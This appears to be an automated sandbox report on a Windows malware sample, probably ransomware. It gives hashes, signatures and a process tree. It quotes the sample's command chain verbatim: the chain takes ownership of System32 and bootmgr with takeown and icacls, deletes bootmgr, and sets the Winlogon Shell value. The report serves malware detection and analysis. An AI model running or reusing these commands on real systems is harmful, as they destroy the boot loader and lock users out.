Analysis
max time kernel: 0s
max time network: 113s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-12-2023 21:51
Behavioral task: behavioral1
Sample: 04df8dd30da8b5853f48cc1ac9b695a8.exe
Resource: win7-20231215-en
Behavioral task: behavioral2
Sample: 04df8dd30da8b5853f48cc1ac9b695a8.exe
Resource: win10v2004-20231215-en
General
Target: 04df8dd30da8b5853f48cc1ac9b695a8.exe
Size: 6.1MB
MD5: 04df8dd30da8b5853f48cc1ac9b695a8
SHA1: 4c02262c2fea0e99277a99dcbe28a9c370b87c39
SHA256: 78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201
SHA512: 3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e
SSDEEP: 3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE
Malware Config
Signatures
Modifies WinLogon for persistence (2 TTPs, 1 IoCs)
  description: Set value (str)
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"
  Process: 04df8dd30da8b5853f48cc1ac9b695a8.exe
Disables Task Manager via registry modification
Possible privilege escalation attempt (7 IoCs)
  pid / Process: 1084 takeown.exe; 2492 takeown.exe; 3380 icacls.exe; 2488 takeown.exe; 4064 icacls.exe; 2680 takeown.exe; 3900 icacls.exe
Modifies file permissions (1 TTPs, 7 IoCs)
  pid / Process: 2492 takeown.exe; 3380 icacls.exe; 2488 takeown.exe; 4064 icacls.exe; 2680 takeown.exe; 3900 icacls.exe; 1084 takeown.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Opens file in notepad (likely ransom note) (1 IoCs)
  pid / Process: 984 NOTEPAD.EXE
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description / pid / Process: Token: SeDebugPrivilege; 2156; 04df8dd30da8b5853f48cc1ac9b695a8.exe
  description / pid / Process: Token: SeDebugPrivilege; 2156; 04df8dd30da8b5853f48cc1ac9b695a8.exe
Processes (indented by depth in the process tree)
C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"
  PID: 2156
  signatures: Modifies WinLogon for persistence; Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
      PID: 1336
        C:\Windows\system32\icacls.exe
          command line: icacls C:\Windows\System32\drivers /grant Admin:F
          PID: 4064
          signatures: Possible privilege escalation attempt; Modifies file permissions
        C:\Windows\system32\takeown.exe
          command line: takeown /f C:\Windows\System32\drivers
          PID: 2680
          signatures: Possible privilege escalation attempt; Modifies file permissions
        C:\Windows\system32\icacls.exe
          command line: icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
          PID: 3900
          signatures: Possible privilege escalation attempt; Modifies file permissions
        C:\Windows\system32\takeown.exe
          command line: takeown /f C:\bootmgr
          PID: 1084
          signatures: Possible privilege escalation attempt; Modifies file permissions
        C:\Windows\system32\takeown.exe
          command line: takeown /f C:\Windows\System32\LogonUI.exe
          PID: 2492
          signatures: Possible privilege escalation attempt; Modifies file permissions
    C:\Windows\system32\NOTEPAD.EXE
      command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
      PID: 984
      signatures: Opens file in notepad (likely ransom note)
    C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
      PID: 1808
C:\Windows\system32\icacls.exe
  command line: icacls C:\Windows\System32 /grant Admin:F
  PID: 3380
  signatures: Possible privilege escalation attempt; Modifies file permissions
C:\Windows\system32\takeown.exe
  command line: takeown /f C:\Windows\System32
  PID: 2488
  signatures: Possible privilege escalation attempt; Modifies file permissions
C:\Windows\system32\rundll32.exe
  command line: rundll32 user32.dll,UpdatePerUserSystemParameters
  PID: 2232
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 11KB
MD5: 49d826b5b43094f6fd04739c6b709ca0
SHA1: a02d1ba89d7599472243279a5896139e86d754e3
SHA256: e62f9094b7f46d4a59bf47a6f6099387cb73f71b9924487e73f188e26c7303d6
SHA512: 8a60272466f674f12ad7b63775e6f51f367d2ec80d9efce8345dfe3a44465ef476dbb334f2e7b49da5f6c32befc2bde62f94090c78df9189253474ddce4ffeb5

C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat
Filesize: 8KB
MD5: ed890ebff57a837bcbee784b268a1d6d
SHA1: f2bd0792ca7b275bee7c4ec0b51193e19227dfb3
SHA256: 1dde681e2814fb5c1babe5cddf4903462db829ce4735ea18bef0345bc0016ced
SHA512: 3ff5e65b3927bffdc8d940c0739a7628541d8d2a565d3daa941c1deed06b6b4a8e2fd0454d9ad96fcf48d390bdd1ffc835dba7cfea63e5838d17db03973d0b65

Filesize: 37KB
MD5: 354af3836d13dc27e65beb7fe917aaff
SHA1: 2ca4375e7161228f5d54bd94fcd6bddb83a647c4
SHA256: 788ecbbbf85c87889f3c2279922021247ffee188b7d89d92765c6f2104180397
SHA512: b6a029ea67d731b0d565669109c0c230e20c423f873d983d5343bf1af296513cdc814a3b3726d407b1b14876b0d5448e1139ac25a92e5da46b596519a4193fc0